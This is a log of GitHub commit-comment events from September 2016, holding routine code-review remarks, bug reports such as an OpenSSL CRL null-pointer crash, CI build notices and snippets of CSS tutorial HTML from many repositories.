{"id":"4601932832","type":"CommitCommentEvent","actor":{"login":"swathi-ssunder"},"repo":{"name":"PokemonGoers/PokeData"},"payload":{"comment":{"id":19128773,"position":10,"line":66,"path":"app/services/database.js","commit_id":"5bb20466757bb0a692a05c202bdf77d9c8c37579","created_at":"2016-09-22T11:45:33Z","updated_at":"2016-09-22T11:45:33Z","body":"In the previous comment, I meant that this code is already there in this file.\r\nSince the function is extracted, just invoke this same `getMongoDbUrl` function even inside the `connect` method."}},"created_at":"2016-09-22T11:45:33Z"}
{"id":"4601934167","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128776,"position":4,"line":81,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/store/parquet/ParquetRecordWriter.java","commit_id":"3cbe5abedf5dac943cd149dc46c7cec5511c63ca","created_at":"2016-09-22T11:45:52Z","updated_at":"2016-09-22T11:45:52Z","body":"public static final String IS_DATE_CORRECT_PROPERTY= \"is.date.correct\";"}},"created_at":"2016-09-22T11:45:52Z"}
{"id":"4601935748","type":"CommitCommentEvent","actor":{"login":"esraekenn"},"repo":{"name":"esraekenn/Haberler-master"},"payload":{"comment":{"id":19128781,"position":null,"line":null,"path":null,"commit_id":"060c137f0217f2f3cd41781374632fc38a912773","created_at":"2016-09-22T11:46:15Z","updated_at":"2016-09-22T11:46:15Z","body":"ş"}},"created_at":"2016-09-22T11:46:15Z"}
{"id":"4601938697","type":"CommitCommentEvent","actor":{"login":"mizdebsk"},"repo":{"name":"rvais/xmvn"},"payload":{"comment":{"id":19128790,"position":34,"line":55,"path":"xmvn-core/src/main/java/org/fedoraproject/xmvn/logging/impl/Slf4jLoggerAdapter.java","commit_id":"cecd37f68ffd5bb0f5405a4b3455f96f2514c954","created_at":"2016-09-22T11:46:58Z","updated_at":"2016-09-22T11:46:58Z","body":"Please set it to \"ALL\" - we want to see all possible debugging output."}},"created_at":"2016-09-22T11:46:58Z"}
{"id":"4601940313","type":"CommitCommentEvent","actor":{"login":"mizdebsk"},"repo":{"name":"rvais/xmvn"},"payload":{"comment":{"id":19128793,"position":42,"line":63,"path":"xmvn-core/src/main/java/org/fedoraproject/xmvn/logging/impl/Slf4jLoggerAdapter.java","commit_id":"cecd37f68ffd5bb0f5405a4b3455f96f2514c954","created_at":"2016-09-22T11:47:20Z","updated_at":"2016-09-22T11:47:20Z","body":"Typo - Gossip should be capitalized."}},"created_at":"2016-09-22T11:47:20Z"}
{"id":"4601940881","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19128795,"position":19,"line":35,"path":"core/descriptor.loader.java/src/org/jetbrains/kotlin/platform/JvmBuiltIns.kt","commit_id":"6e679acfb1ea606bc448e3981c97c56fae80cc51","created_at":"2016-09-22T11:47:27Z","updated_at":"2016-09-22T11:47:27Z","body":"Maybe this property should be exposed publicly only as a `val`, and be backed by a `private lateinit var`"}},"created_at":"2016-09-22T11:47:27Z"}
{"id":"4601950722","type":"CommitCommentEvent","actor":{"login":"edolstra"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19128815,"position":null,"line":null,"path":null,"commit_id":"01e44ac1f9af1d42ee9b5000426b780f2a03c948","created_at":"2016-09-22T11:49:50Z","updated_at":"2016-09-22T11:49:50Z","body":"Maybe we should hold off from upgrading to Emacs 25 in Nixpkgs, given that it's only 5 days old at this point. We should probably provide for some time for the various upstream Emacs packages to be fixed. Just like we don't generally switch to the latest GCC release either."}},"created_at":"2016-09-22T11:49:50Z"}
{"id":"4601951556","type":"CommitCommentEvent","actor":{"login":"anayyadav"},"repo":{"name":"anayyadav/Anay-Naved-Suryakant"},"payload":{"comment":{"id":19128820,"position":null,"line":null,"path":null,"commit_id":"f523f8bb13835b2eeaa9a4cc9bce566df4fc1829","created_at":"2016-09-22T11:50:02Z","updated_at":"2016-09-22T11:50:02Z","body":"[Devp_tracebility.docx](https://github.com/anayyadav/Anay-Naved-Suryakant/files/487160/Devp_tracebility.docx)\r\n[Feasability_collage_Mart.docx](https://github.com/anayyadav/Anay-Naved-Suryakant/files/487161/Feasability_collage_Mart.docx)\r\n[Req_tracebility_college_mart.xlsx](https://github.com/anayyadav/Anay-Naved-Suryakant/files/487163/Req_tracebility_college_mart.xlsx)\r\n[SRS_College_Mart.pdf](https://github.com/anayyadav/Anay-Naved-Suryakant/files/487162/SRS_College_Mart.pdf)\r\n"}},"created_at":"2016-09-22T11:50:02Z"}
{"id":"4601953419","type":"CommitCommentEvent","actor":{"login":"xuyihang"},"repo":{"name":"Mooophy/Cpp-Primer"},"payload":{"comment":{"id":19128825,"position":null,"line":null,"path":null,"commit_id":"3b5ddad1f32a1a5c0bb4b2a2a2608f6dce535f8b","created_at":"2016-09-22T11:50:26Z","updated_at":"2016-09-22T11:50:26Z","body":"auto在这里只起占位的作用，必须在形参列表后面加上函数的返回类型。（其实尾置返回类型主要用于返回类型比较复杂的函数）\r\n\r\n发自我的 iPhone\r\n\r\n> 在 2016年9月22日，19:42，Lynn <notifications@github.com> 写道：\r\n> \r\n> 您好，我尝试运行这个程序，但是编译器报错： error C3551: 应提供结尾返回类型 \r\n> \r\n> 是我的编译器问题吗？好像auto在这里不能推断出返回类型\r\n> \r\n> —\r\n> You are receiving this because you are subscribed to this thread.\r\n> Reply to this email directly, view it on GitHub, or mute the thread.\r\n> \r\n"}},"created_at":"2016-09-22T11:50:26Z"}
{"id":"4601953448","type":"CommitCommentEvent","actor":{"login":"benjamin10nu"},"repo":{"name":"benjamin10nu/hello-world-"},"payload":{"comment":{"id":19128826,"position":1,"line":1,"path":"README.md","commit_id":"413d726c58668c3473428adefe0718c914198d77","created_at":"2016-09-22T11:50:27Z","updated_at":"2016-09-22T11:50:27Z","body":"hello [sexy chicas] world"}},"created_at":"2016-09-22T11:50:27Z"}
{"id":"4601954698","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19128830,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-22T11:50:45Z","updated_at":"2016-09-22T11:50:45Z","body":"@thanhthuy89 Why do you want to skip CM Setup Wizard?"}},"created_at":"2016-09-22T11:50:45Z"}
{"id":"4601955712","type":"CommitCommentEvent","actor":{"login":"fake666"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":19128837,"position":null,"line":null,"path":null,"commit_id":"325da8231c8d441e6bb7f15d1a5a23ff63c842e5","created_at":"2016-09-22T11:50:59Z","updated_at":"2016-09-22T11:50:59Z","body":"this causes segfaults for me - the X509_CRL_get_lastUpdate is called even if best_crl is NULL.. \r\n\r\n\r\n```\r\n* thread #1: tid = 0x1a9af, 0x000000010050fbc6 testrunner get_crl_sk(ctx=0x0000000101a0c990, pcrl=0x00007fff5fbfe290, pdcrl=0x00007fff5fbfe288, pissuer=0x00007fff5fbfe2a0, pscore=0x00007fff5fbfe29c, preasons=0x00007fff5fbfe298, crls=0x0000000101a10a80) + 262 at x509_vfy.c:1132, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x0)\r\n    frame #0: 0x000000010050fbc6 testrunner get_crl_sk(ctx=0x0000000101a0c990, pcrl=0x00007fff5fbfe290, pdcrl=0x00007fff5fbfe288, pissuer=0x00007fff5fbfe2a0, pscore=0x00007fff5fbfe29c, preasons=0x00007fff5fbfe298, crls=0x0000000101a10a80) + 262 at x509_vfy.c:1132\r\n   1129\t        /* If current CRL is equivalent use it if it is newer */\r\n   1130\t        if (crl_score == best_score) {\r\n   1131\t            int day, sec;\r\n-> 1132\t            if (ASN1_TIME_diff(&day, &sec, X509_CRL_get_lastUpdate(best_crl),\r\n   1133\t                               X509_CRL_get_lastUpdate(crl)) == 0)\r\n   1134\t                continue;\r\n   1135\t            /*\r\n```\r\n\r\nbest_score and crl_score are both zero. crl is set, but best_crl is still NULL."}},"created_at":"2016-09-22T11:50:59Z"}
{"id":"4601956710","type":"CommitCommentEvent","actor":{"login":"may-cat"},"repo":{"name":"bitrix-expert/bitrix_boilerplate"},"payload":{"comment":{"id":19128841,"position":null,"line":null,"path":null,"commit_id":"a642ad6898f9ed112fc04f9f63b3a14b645746f5","created_at":"2016-09-22T11:51:13Z","updated_at":"2016-09-22T11:51:13Z","body":"@nook-ru у меня wizard.php под рукой только обфусцированный. Есть открытый вариант? Скинешь в личку?"}},"created_at":"2016-09-22T11:51:13Z"}
{"id":"4601956784","type":"CommitCommentEvent","actor":{"login":"aradjdi"},"repo":{"name":"angular/angular-fr"},"payload":{"comment":{"id":19128842,"position":null,"line":null,"path":null,"commit_id":"4a3250cf27f8ebfd3e39bbbf59f77db1548402fa","created_at":"2016-09-22T11:51:14Z","updated_at":"2016-09-22T11:51:14Z","body":"Ok, my bad, sorry.\r\nI'll put back English text in a new commit ASAP."}},"created_at":"2016-09-22T11:51:14Z"}
{"id":"4601957191","type":"CommitCommentEvent","actor":{"login":"jordens"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":19128844,"position":null,"line":null,"path":null,"commit_id":"a0291ceddc19c445419754a26df04cb71fe9b699","created_at":"2016-09-22T11:51:20Z","updated_at":"2016-09-22T11:51:20Z","body":"Maybe. If it ends up like that I'd put stuff like initializing the DAC and the JESD stuff into the startup kernel and e.g. some parts of the datapath in the DAC (NCO, coarse mixing, gain, offset, interpolation, filters, IQ...) into the startup kernel and/or individual experiments.\r\nBut it might make sense to split it and have the gateware- and hardware-dependent part of programming the DAC and the JESD links be done in the runtime of the respective Sayma. And once the links are up and aligned etc, the higher signal layer programming would be through experiments."}},"created_at":"2016-09-22T11:51:20Z"}
{"id":"4601958923","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19128852,"position":33,"line":142,"path":"compiler/frontend.java/src/org/jetbrains/kotlin/frontend/java/di/injection.kt","commit_id":"6e679acfb1ea606bc448e3981c97c56fae80cc51","created_at":"2016-09-22T11:51:45Z","updated_at":"2016-09-22T11:51:45Z","body":"Maybe this method could be named so that no one would want to call it in container creation for IDE, e.g. `initJvmBuiltInsForTopDownAnalysis`?"}},"created_at":"2016-09-22T11:51:45Z"}
{"id":"4601959500","type":"CommitCommentEvent","actor":{"login":"LDVSOFT"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19128853,"position":2,"line":2,"path":"script.sql","commit_id":"0ea35d725263f629e115d525d113f77a50fb764f","created_at":"2016-09-22T11:51:54Z","updated_at":"2016-09-22T11:51:54Z","body":"Добавить бы `DROP TABLE`."}},"created_at":"2016-09-22T11:51:54Z"}
{"id":"4601960229","type":"CommitCommentEvent","actor":{"login":"aminal90"},"repo":{"name":"aminal90/Git-test"},"payload":{"comment":{"id":19128855,"position":4,"line":5,"path":"lesson 20 git-test project/src/az/aminal/test/Main.java","commit_id":"00257fc810099b296e0e74f84306c48ddb09031a","created_at":"2016-09-22T11:52:05Z","updated_at":"2016-09-22T11:52:05Z","body":"123"}},"created_at":"2016-09-22T11:52:05Z"}
{"id":"4601961625","type":"CommitCommentEvent","actor":{"login":"AthenaIak"},"repo":{"name":"mkneuron/compneuro"},"payload":{"comment":{"id":19128857,"position":4,"line":169,"path":"week2/perceptronNo2","commit_id":"5ea96f757b37794dffbb666156f071523c87474a","created_at":"2016-09-22T11:52:23Z","updated_at":"2016-09-22T11:52:23Z","body":"Don't worry; I delete it for you ;)"}},"created_at":"2016-09-22T11:52:23Z"}
{"id":"4601963154","type":"CommitCommentEvent","actor":{"login":"LDVSOFT"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19128861,"position":49,"line":49,"path":"script.sql","commit_id":"0ea35d725263f629e115d525d113f77a50fb764f","created_at":"2016-09-22T11:52:45Z","updated_at":"2016-09-22T11:52:45Z","body":"Это на самом деле `Warehouse` из моего блока)"}},"created_at":"2016-09-22T11:52:45Z"}
{"id":"4601963322","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19128863,"position":null,"line":null,"path":null,"commit_id":"7b4f6098e0d6b87125a1c9c3a3f02a6381d9688a","created_at":"2016-09-22T11:52:47Z","updated_at":"2016-09-22T11:52:47Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/528/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=revert-68-XW-2076)."}},"created_at":"2016-09-22T11:52:47Z"}
{"id":"4601963767","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128867,"position":17,"line":72,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestCorruptParquetDateCorrection.java","commit_id":"0d57f05536098ba001f02e3e5374b3ae8c707559","created_at":"2016-09-22T11:52:53Z","updated_at":"2016-09-22T11:52:53Z","body":"remove reference drill.version 1.9-SNAPSHOT"}},"created_at":"2016-09-22T11:52:53Z"}
{"id":"4601964116","type":"CommitCommentEvent","actor":{"login":"arina-ielchiieva"},"repo":{"name":"vdiravka/drill"},"payload":{"comment":{"id":19128868,"position":38,"line":126,"path":"exec/java-exec/src/test/java/org/apache/drill/exec/physical/impl/writer/TestCorruptParquetDateCorrection.java","commit_id":"0d57f05536098ba001f02e3e5374b3ae8c707559","created_at":"2016-09-22T11:52:58Z","updated_at":"2016-09-22T11:52:58Z","body":"remove reference drill.version 1.9-SNAPSHOT"}},"created_at":"2016-09-22T11:52:58Z"}
{"id":"4601964252","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19128869,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T11:53:00Z","updated_at":"2016-09-22T11:53:00Z","body":"now:\r\nradare2 0.10.6-git 12465 @ linux-x86-64 git.0.10.5-329-gc908e0f\r\ncommit: c908e0f8185a6a4940382a088b93a534cca0e435 build: 2016-09-22\r\n\r\nis working 4  minutes now...  "}},"created_at":"2016-09-22T11:53:00Z"}
{"id":"4601967216","type":"CommitCommentEvent","actor":{"login":"LDVSOFT"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19128876,"position":4,"line":4,"path":"script.sql","commit_id":"0ea35d725263f629e115d525d113f77a50fb764f","created_at":"2016-09-22T11:53:42Z","updated_at":"2016-09-22T11:53:42Z","body":"`id` vs `num`? Мы не считаем, что это на самом деле одно и то же?"}},"created_at":"2016-09-22T11:53:42Z"}
{"id":"4601968271","type":"CommitCommentEvent","actor":{"login":"LDVSOFT"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19128879,"position":10,"line":10,"path":"script.sql","commit_id":"0ea35d725263f629e115d525d113f77a50fb764f","created_at":"2016-09-22T11:53:56Z","updated_at":"2016-09-22T11:53:56Z","body":"`PRIMARY KEY`?"}},"created_at":"2016-09-22T11:53:56Z"}
{"id":"4601968934","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":19128880,"position":null,"line":null,"path":null,"commit_id":"9011845d4762d254a4cf40a29d0e1b9f912060ef","created_at":"2016-09-22T11:54:05Z","updated_at":"2016-09-22T11:54:05Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Xcxz0oeg&#x2F;1999-bug-983663-documenting-usr-share-doc-packages-salt-ceph-examples-cluster-buildup-sls-components\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Bug 983663 - documenting &#x2F;usr&#x2F;share&#x2F;doc&#x2F;packages&#x2F;salt-ceph&#x2F;examples&#x2F;cluster_buildup.sls components.</a>"}},"created_at":"2016-09-22T11:54:05Z"}
{"id":"4601974084","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"CyanogenMod/android_frameworks_opt_telephony"},"payload":{"comment":{"id":19128891,"position":null,"line":null,"path":null,"commit_id":"ede5699637afffead01271a3520a3bd886fc6174","created_at":"2016-09-22T11:55:17Z","updated_at":"2016-09-22T11:55:17Z","body":"after this commit SIM is detected but signal is unstable on msm8916 dual sim.  periodically the signal is lost and gained with message \"you lost data connectivity ....\""}},"created_at":"2016-09-22T11:55:17Z"}
{"id":"4601975380","type":"CommitCommentEvent","actor":{"login":"eugeneia"},"repo":{"name":"ioannad/experiments"},"payload":{"comment":{"id":19128895,"position":53,"line":56,"path":"rpiOS/K9OS/k9os.c","commit_id":"dab4692eedcefd23f5acb07591d03878ce776c42","created_at":"2016-09-22T11:55:36Z","updated_at":"2016-09-22T11:55:36Z","body":"> Not that there's a reason for doing the latter outside the IOCCC...\r\n\r\nI will *always* do it that way from now on! :smiling_imp: "}},"created_at":"2016-09-22T11:55:36Z"}
{"id":"4601986207","type":"CommitCommentEvent","actor":{"login":"zhangmao1991"},"repo":{"name":"zhangmao1991/zhangmao1991.github.io"},"payload":{"comment":{"id":19128918,"position":null,"line":null,"path":null,"commit_id":"ed0c35064bd0004698cd2d3792ac6d753951e43a","created_at":"2016-09-22T11:58:14Z","updated_at":"2016-09-22T11:58:14Z","body":"<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n    <meta charset=\"UTF-8\">\r\n    <meta name=\"author\" content=\"张毛\">\r\n    <title>过渡动画</title>\r\n    <style>\r\n        html,body{\r\n            width: 100%;\r\n            height: 100%;\r\n            background-color: black;\r\n        }\r\n        section{\r\n            width: 300px;\r\n            height: 300px;\r\n            background-color: red;\r\n            border-radius: 50%;\r\n            text-align: center;\r\n            color: white;\r\n            margin: 100px auto;\r\n            \r\n            \r\n            /*过渡动画：transition*/\r\n            \r\n            /*transition：转变；变化；过渡；变迁\r\n            property：属性；性质*/\r\n            /*transition-property：要给哪个属性做过渡动画（指明哪些属性在变化的时候，产生过渡效果），\r\n            如果有多个属性，那么要用逗号隔开。*/\r\n            /*可以做过渡动画效果的属性详见：\r\n            http://www.css88.com/book/css/properties/transition/transition-property.htm*/\r\n            /*transition-property: transform,border,box-shadow,font-size,background-color;*/\r\n            /*duration：在……期间，持续时间*/\r\n            /*transition-duration: 5s;*/\r\n            /*timing：时间，function：方法，功能\r\n            缓动函数，指渐变过程的变化速率*/\r\n            /*ease 缓慢 \r\n            ease-in 缓慢开始，是一个加速的过程\r\n            ease-out 缓慢结束，是一个减速的过程\r\n            ease-in-out 缓慢开始缓慢结束，是一个先加速后减速的过程\r\n            linear 允许 \r\n            cubic-bezier(,,,) 贝塞尔曲线，3次贝塞尔曲线，有两个控制点，控制点不一样，代表不一定的速率\r\n            贝塞尔曲线详见：http://cubic-bezier.com/\r\n            */\r\n            /*transition-timing-function: cubic-bezier(0.53,0.68,1,0.29);*/\r\n            /*delay：延迟，延时，延时一定的时间来做这个过渡效果\r\n            如果取负值，不但不延时，相反会提前相应的时间直接来执行过渡效果\r\n            */\r\n            /*transition-delay: 2s;*/\r\n            \r\n            \r\n            /*合写过渡动画\r\n            属性名(property)  持续时间(duration)  速率(timing-function)   延时(delay)*/\r\n            transition: border 5s linear 2s;\r\n        }\r\n        body>section:active{\r\n            transform: scale(1.5);\r\n            border: 10px solid blue;\r\n            box-shadow: 0px 0px 10px 20px white;\r\n            font-size: 50px;\r\n            background-color: green;\r\n        }\r\n    </style>\r\n</head>\r\n<body>\r\n    <section>过渡动画</section>\r\n</body>\r\n</html>\r\n"}},"created_at":"2016-09-22T11:58:14Z"}
{"id":"4601986968","type":"CommitCommentEvent","actor":{"login":"AnnieShi"},"repo":{"name":"AnnieShi/responsive-image-section"},"payload":{"comment":{"id":19128921,"position":null,"line":null,"path":null,"commit_id":"ed8a5e53e21f5922ed59943f5af6d40ed87e4bfb","created_at":"2016-09-22T11:58:25Z","updated_at":"2016-09-22T11:58:25Z","body":"I believe this is me reorganizing my files."}},"created_at":"2016-09-22T11:58:25Z"}
{"id":"4601988146","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19128928,"position":62,"line":98,"path":"core/descriptor.loader.java/src/org/jetbrains/kotlin/load/kotlin/JvmBuiltInsSettings.kt","commit_id":"ca2a3b742b050e22fd557ea3dc9c69a6cfc7e521","created_at":"2016-09-22T11:58:40Z","updated_at":"2016-09-22T11:58:40Z","body":"Looks like `lowPriorityAnnotation` is never null, so a list of two elements may be created instead"}},"created_at":"2016-09-22T11:58:40Z"}
{"id":"4601992416","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"romy-khetan/CASK-PSL"},"payload":{"comment":{"id":19128944,"position":null,"line":null,"path":null,"commit_id":"6743a1a1c25b7fe8103a8de7ddca671b69f29381","created_at":"2016-09-22T11:59:45Z","updated_at":"2016-09-22T11:59:45Z","body":"Minor comments. Just need to confirm the usage for FileUtils since the file is only for inserting test data"}},"created_at":"2016-09-22T11:59:45Z"}
{"id":"4601993708","type":"CommitCommentEvent","actor":{"login":"zhangmao1991"},"repo":{"name":"zhangmao1991/zhangmao1991.github.io"},"payload":{"comment":{"id":19128947,"position":null,"line":null,"path":null,"commit_id":"ed0c35064bd0004698cd2d3792ac6d753951e43a","created_at":"2016-09-22T12:00:03Z","updated_at":"2016-09-22T12:00:03Z","body":"<html>\r\n    <head>\r\n        <meta charset=\"utf-8\">\r\n        <title>外边距、内边距</title>\r\n        <!--内联样式，样式表-->\r\n        <style>\r\n            body{\r\n                /*body:默认有8px的外边距*/\r\n                /*margin = margin-top + margin-right \r\n                margin-bottom + margin-left*/\r\n\r\n                /*消除body的外边距*/\r\n                margin: 0;\r\n            }\r\n            /*通过一个标签的id，也可以给这个标签设置样式，形如：#id{}*/\r\n            /*意思：给标签id = first的设置样式*/\r\n            #first{\r\n                width: 300px;\r\n                height: 400px;\r\n                background-color: #345;\r\n                /*左边和下边外边距*/\r\n                margin-left: 100px;\r\n                margin-bottom: 20px;\r\n            }\r\n            #second{\r\n                width: 400px;\r\n                height: 400px;\r\n                background-color: orange;\r\n                /*内边距：padding*/\r\n                /*padding: 20px; 上右下左*/\r\n                /*padding: 10px 20px; 上下 左右*/\r\n                /*padding: 10px 20px 30px; 上 左右 下*/\r\n                /*上 右 下 左*/\r\n                padding: 10px 20px 30px 40px;\r\n            }\r\n            #third{\r\n                height: 700px;\r\n                background-color: red;\r\n                /*格式化上下文*/\r\n                overflow: hidden;\r\n            }\r\n            /*意思：找一个标签id = third的所有子标签中是img的子标签*/\r\n            /*#third img{\r\n                \r\n            }*/\r\n            #third div{\r\n                width: 200px;\r\n                height: 200px;\r\n                background-color: yellow;\r\n                /*\b上下50px 左右居中*/\r\n                margin: 50px auto;\r\n            }\r\n        </style>\r\n    </head>\r\n    <body>\r\n        <!--div：块元素-->\r\n        <!--id：identifier 标识符(唯一的)-->\r\n        <div id=\"first\"></div>\r\n        <div id=\"second\"></div>\r\n        <div id=\"third\">\r\n            <!--img：行内块-->\r\n            <!--<img src=\"1.jpg\" alt=\"图片\" title=\"小偷在失主家睡着了\">-->\r\n            <div></div>\r\n        </div>\r\n    </body>\r\n</html>"}},"created_at":"2016-09-22T12:00:03Z"}
{"id":"4601994784","type":"CommitCommentEvent","actor":{"login":"fake666"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":19128952,"position":null,"line":null,"path":null,"commit_id":"325da8231c8d441e6bb7f15d1a5a23ff63c842e5","created_at":"2016-09-22T12:00:16Z","updated_at":"2016-09-22T12:00:16Z","body":"reported as issue https://github.com/openssl/openssl/issues/1611 - fix is trivial, so no patch ;)"}},"created_at":"2016-09-22T12:00:16Z"}
{"id":"4602000521","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19128962,"position":null,"line":null,"path":null,"commit_id":"a601645c36749607ff70b449cc9fa452448f7dab","created_at":"2016-09-22T12:01:34Z","updated_at":"2016-09-22T12:01:34Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a601645c36749607ff70b449cc9fa452448f7dab-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T12:01:34Z"}
{"id":"4602003057","type":"CommitCommentEvent","actor":{"login":"esCharacter"},"repo":{"name":"MorriganMesser/PrimaryArithmetic"},"payload":{"comment":{"id":19128973,"position":null,"line":null,"path":null,"commit_id":"34cd8563ab95e17582596b69afa036c720ba9990","created_at":"2016-09-22T12:02:07Z","updated_at":"2016-09-22T12:02:07Z","body":"someone to replenish this part"}},"created_at":"2016-09-22T12:02:07Z"}
{"id":"4602004023","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19128979,"position":null,"line":null,"path":null,"commit_id":"085107be625dcca5bd9d362d0013f42cfc0cad7d","created_at":"2016-09-22T12:02:18Z","updated_at":"2016-09-22T12:02:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 61](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13927&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-22T12:02:18Z"}
{"id":"4602006573","type":"CommitCommentEvent","actor":{"login":"Gustry"},"repo":{"name":"boundlessgeo/qgis-testing-environment-docker"},"payload":{"comment":{"id":19128987,"position":null,"line":null,"path":null,"commit_id":"f7638cd9dddb4648e38992d6705155cd2811980c","created_at":"2016-09-22T12:02:52Z","updated_at":"2016-09-22T12:02:52Z","body":"Could you have a look to the PR https://github.com/boundlessgeo/qgis-testing-environment-docker/pull/3 ?\r\nIs your commit printing on console test per test ? Or does it still print everything at the end of test_runner.py ?\r\n"}},"created_at":"2016-09-22T12:02:52Z"}
{"id":"4602008149","type":"CommitCommentEvent","actor":{"login":"BenDol"},"repo":{"name":"GwtMaterialDesign/gwt-material-addins"},"payload":{"comment":{"id":19128993,"position":4,"line":31,"path":"src/main/java/gwt/material/design/addins/client/richeditor/MaterialRichEditor.java","commit_id":"49634a95e5a5a94c5be193849a9f39dbf517bd44","created_at":"2016-09-22T12:03:14Z","updated_at":"2016-09-22T12:03:14Z","body":"What is this import?"}},"created_at":"2016-09-22T12:03:14Z"}
{"id":"4602008689","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19128995,"position":51,"line":51,"path":"idea/src/org/jetbrains/kotlin/idea/ForkJoinPoolPatcherForTeamCityTesting.kt","commit_id":"675575decc9524b9938ea6891015a42c8b629072","created_at":"2016-09-22T12:03:21Z","updated_at":"2016-09-22T12:03:21Z","body":"I think this should be removed to reduce noise in logs"}},"created_at":"2016-09-22T12:03:21Z"}
{"id":"4602009931","type":"CommitCommentEvent","actor":{"login":"40423236"},"repo":{"name":"40423236/40423236.github.io"},"payload":{"comment":{"id":19128997,"position":null,"line":null,"path":null,"commit_id":"29f31053ec54681867406a6f405820d0ab1c28a9","created_at":"2016-09-22T12:03:39Z","updated_at":"2016-09-22T12:03:39Z","body":"test"}},"created_at":"2016-09-22T12:03:39Z"}
{"id":"4602011388","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129000,"position":null,"line":null,"path":null,"commit_id":"085107be625dcca5bd9d362d0013f42cfc0cad7d","created_at":"2016-09-22T12:04:00Z","updated_at":"2016-09-22T12:04:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 61](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13927&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:42"}},"created_at":"2016-09-22T12:04:00Z"}
{"id":"4602018495","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19129017,"position":null,"line":null,"path":null,"commit_id":"f2ac9522781cf1a560bb935d4e333fba72de3778","created_at":"2016-09-22T12:05:39Z","updated_at":"2016-09-22T12:05:39Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2371 of 2374 tests passed, 1 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> 